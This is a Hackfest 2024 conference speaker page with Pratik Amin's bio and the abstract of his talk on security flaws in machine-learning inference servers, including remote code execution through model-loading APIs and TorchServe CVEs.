Hackfest 2024 - Édition 16-bit

Vos préférences linguistiques ont été sauvées. Nous pensons que nous avons une bonne traduction française, mais si vous rencontrez des problèmes ou des erreurs, veuillez nous contacter !

Pratik Amin

My name is Pratik Amin and I have been working in Application Security for about 15 years now. I am a Principal Security Consultant at Kroll (previously Security Compass). I've spent a lot of that time doing AppSec pentests and digging into interesting technology.


De quel pays êtes vous?

Canada

Votre compte twitter ou autre réseau social

https://twitter.com/pratikamin


Intervention

12 oct.
14:30
50minutes
Inference Servers: new technology, same old security flaws.
Pratik Amin

AI and LLM based applications are taking the industry by storm. While a lot time is spent on evaluating prompt injection there is an entire ecosystem of applications that allow models to be run and used. These applications have their own security considerations that you should be aware of.

Inference Servers are used to host machine learning models and expose APIs that allow other components to perform inference on those models. These servers often expose additional APIs that allow users to load new models into them, which can be abused to perform remote code execution. While this technology is new, the baseline security configurations for many of these products are a relic from the past.

In this talk I will talk about what an inference server is, how they work, and explain how you can achieve remote code execution in them. This talk will be more focused on practical security risks involved in this ecosystem. I will also share the details for a couple of CVEs related to TorchServe.

Sécurité IA
Track 2 (206a)